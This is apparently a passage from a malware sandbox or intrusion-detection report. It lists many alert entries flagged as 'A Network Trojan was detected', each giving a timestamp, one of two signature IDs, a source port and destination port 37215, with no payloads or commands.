                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149230
                SID:2835222
                Source Port:41460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968617
                SID:2829579
                Source Port:53342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517737
                SID:2835222
                Source Port:33416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684821
                SID:2829579
                Source Port:41850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012745
                SID:2835222
                Source Port:52386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.760908
                SID:2829579
                Source Port:56130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409468
                SID:2835222
                Source Port:53228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148925
                SID:2829579
                Source Port:47088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275987
                SID:2835222
                Source Port:48154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420067
                SID:2835222
                Source Port:38068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180997
                SID:2829579
                Source Port:47818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074126
                SID:2829579
                Source Port:43976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683663
                SID:2835222
                Source Port:56146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053550
                SID:2829579
                Source Port:47462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.027840
                SID:2835222
                Source Port:59522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028321
                SID:2835222
                Source Port:40106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277715
                SID:2835222
                Source Port:55752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368859
                SID:2829579
                Source Port:34700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644935
                SID:2829579
                Source Port:59228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669446
                SID:2835222
                Source Port:52302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160415
                SID:2835222
                Source Port:40372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.336570
                SID:2835222
                Source Port:54120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849739
                SID:2829579
                Source Port:42862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451430
                SID:2835222
                Source Port:35158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805529
                SID:2829579
                Source Port:58172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726982
                SID:2829579
                Source Port:43478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276652
                SID:2835222
                Source Port:39622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242688
                SID:2835222
                Source Port:44068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453004
                SID:2835222
                Source Port:60488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.987691
                SID:2835222
                Source Port:34734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289799
                SID:2829579
                Source Port:50670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661329
                SID:2829579
                Source Port:42150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672285
                SID:2835222
                Source Port:57364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451600
                SID:2835222
                Source Port:38752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293592
                SID:2829579
                Source Port:34750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519604
                SID:2835222
                Source Port:58614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033817
                SID:2835222
                Source Port:47064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807103
                SID:2829579
                Source Port:51094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295598
                SID:2835222
                Source Port:33392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366309
                SID:2829579
                Source Port:43276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342432
                SID:2829579
                Source Port:47184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662438
                SID:2835222
                Source Port:43196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290011
                SID:2835222
                Source Port:52314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830460
                SID:2835222
                Source Port:35568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149362
                SID:2835222
                Source Port:36998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941112
                SID:2835222
                Source Port:52668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.278006
                SID:2829579
                Source Port:57646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275326
                SID:2829579
                Source Port:55152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717433
                SID:2835222
                Source Port:49548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942390
                SID:2829579
                Source Port:59152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718102
                SID:2829579
                Source Port:35722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846513
                SID:2829579
                Source Port:41334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381715
                SID:2835222
                Source Port:40322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914480
                SID:2835222
                Source Port:57500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932818
                SID:2829579
                Source Port:38408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032765
                SID:2829579
                Source Port:40812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341037
                SID:2835222
                Source Port:33358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450011
                SID:2835222
                Source Port:58536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291953
                SID:2829579
                Source Port:33720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032955
                SID:2829579
                Source Port:46712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185866
                SID:2829579
                Source Port:45082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339395
                SID:2829579
                Source Port:39730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025237
                SID:2829579
                Source Port:38920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071529
                SID:2835222
                Source Port:50692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115825
                SID:2829579
                Source Port:51546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115936
                SID:2835222
                Source Port:35488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202370
                SID:2835222
                Source Port:56260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424955
                SID:2829579
                Source Port:42268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198666
                SID:2829579
                Source Port:48336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734737
                SID:2829579
                Source Port:57610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671789
                SID:2829579
                Source Port:49548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614082
                SID:2835222
                Source Port:54454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777185
                SID:2835222
                Source Port:41978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253610
                SID:2829579
                Source Port:55218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806218
                SID:2829579
                Source Port:50266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083757
                SID:2829579
                Source Port:57590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054839
                SID:2835222
                Source Port:46504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916235
                SID:2829579
                Source Port:48836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670042
                SID:2835222
                Source Port:57830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074585
                SID:2835222
                Source Port:33346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661085
                SID:2835222
                Source Port:53984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150934
                SID:2829579
                Source Port:48054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942635
                SID:2829579
                Source Port:39644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878603
                SID:2829579
                Source Port:46472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986019
                SID:2829579
                Source Port:39006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.907077
                SID:2835222
                Source Port:35702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985924
                SID:2835222
                Source Port:57926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230262
                SID:2835222
                Source Port:51888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979064
                SID:2835222
                Source Port:43628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230087
                SID:2835222
                Source Port:45788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149967
                SID:2835222
                Source Port:41896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999723
                SID:2835222
                Source Port:54832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618280
                SID:2835222
                Source Port:37770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761921
                SID:2835222
                Source Port:50892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025201
                SID:2829579
                Source Port:40092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661227
                SID:2829579
                Source Port:48308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941619
                SID:2835222
                Source Port:42718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614272
                SID:2835222
                Source Port:51398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809955
                SID:2835222
                Source Port:56438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134249
                SID:2835222
                Source Port:58628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146648
                SID:2835222
                Source Port:36744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201260
                SID:2829579
                Source Port:45830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.162443
                SID:2835222
                Source Port:36566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092268
                SID:2835222
                Source Port:36154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718129
                SID:2829579
                Source Port:39984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134497
                SID:2835222
                Source Port:56848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185924
                SID:2829579
                Source Port:41156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001937
                SID:2835222
                Source Port:60082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830691
                SID:2829579
                Source Port:38756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033093
                SID:2829579
                Source Port:53692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663735
                SID:2835222
                Source Port:54158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184472
                SID:2835222
                Source Port:41776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275535
                SID:2835222
                Source Port:48764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033274
                SID:2829579
                Source Port:45296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810090
                SID:2829579
                Source Port:56888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244076
                SID:2835222
                Source Port:37102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812030
                SID:2829579
                Source Port:36866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469590
                SID:2835222
                Source Port:42270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543803
                SID:2829579
                Source Port:43758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679416
                SID:2829579
                Source Port:53714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245359
                SID:2829579
                Source Port:48050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972448
                SID:2829579
                Source Port:38714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423854
                SID:2829579
                Source Port:44764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014229
                SID:2835222
                Source Port:47548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073530
                SID:2829579
                Source Port:52022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677576
                SID:2829579
                Source Port:53932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321939
                SID:2835222
                Source Port:51372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792157
                SID:2835222
                Source Port:34582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056458
                SID:2829579
                Source Port:36448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548414
                SID:2829579
                Source Port:50980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406904
                SID:2829579
                Source Port:56854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051405
                SID:2835222
                Source Port:39564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073212
                SID:2829579
                Source Port:47634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942353
                SID:2829579
                Source Port:33536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726155
                SID:2835222
                Source Port:47718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906063
                SID:2835222
                Source Port:55576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878706
                SID:2835222
                Source Port:35590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662859
                SID:2829579
                Source Port:58632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684168
                SID:2829579
                Source Port:41994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542836
                SID:2829579
                Source Port:43186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860301
                SID:2835222
                Source Port:40046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898139
                SID:2835222
                Source Port:56464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645230
                SID:2835222
                Source Port:56378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672068
                SID:2829579
                Source Port:41196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186666
                SID:2835222
                Source Port:35002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718647
                SID:2829579
                Source Port:60260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943958
                SID:2835222
                Source Port:36136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810139
                SID:2829579
                Source Port:53688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676562
                SID:2835222
                Source Port:51364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828531
                SID:2829579
                Source Port:42488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807605
                SID:2835222
                Source Port:57288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729929
                SID:2835222
                Source Port:50622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202916
                SID:2829579
                Source Port:45662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715940
                SID:2829579
                Source Port:47954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704557
                SID:2835222
                Source Port:41052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998088
                SID:2829579
                Source Port:34194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149059
                SID:2835222
                Source Port:54672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881088
                SID:2829579
                Source Port:33956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.788680
                SID:2829579
                Source Port:35666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970924
                SID:2829579
                Source Port:60320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625474
                SID:2835222
                Source Port:51296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325015
                SID:2835222
                Source Port:58908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916049
                SID:2829579
                Source Port:55046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881746
                SID:2829579
                Source Port:41128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880805
                SID:2835222
                Source Port:33310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808260
                SID:2829579
                Source Port:50686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.015859
                SID:2829579
                Source Port:57094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276179
                SID:2835222
                Source Port:41336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230353
                SID:2835222
                Source Port:36944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676115
                SID:2829579
                Source Port:54480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760243
                SID:2835222
                Source Port:49000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640989
                SID:2829579
                Source Port:50656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054344
                SID:2835222
                Source Port:37886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677130
                SID:2835222
                Source Port:39466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.909302
                SID:2835222
                Source Port:51638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848630
                SID:2835222
                Source Port:39634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968480
                SID:2829579
                Source Port:47370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718592
                SID:2829579
                Source Port:60824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669623
                SID:2829579
                Source Port:46504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.907137
                SID:2835222
                Source Port:44580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.877613
                SID:2829579
                Source Port:35590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181087
                SID:2835222
                Source Port:59158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978725
                SID:2835222
                Source Port:60776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729152
                SID:2829579
                Source Port:54164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365982
                SID:2829579
                Source Port:39276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705099
                SID:2829579
                Source Port:42082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679444
                SID:2829579
                Source Port:49788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503406
                SID:2829579
                Source Port:55760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230646
                SID:2835222
                Source Port:59688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134787
                SID:2829579
                Source Port:43792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150187
                SID:2829579
                Source Port:55846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934237
                SID:2835222
                Source Port:56698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968236
                SID:2835222
                Source Port:49382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149592
                SID:2835222
                Source Port:40160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001039
                SID:2829579
                Source Port:42286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253434
                SID:2829579
                Source Port:53764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914840
                SID:2835222
                Source Port:54682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
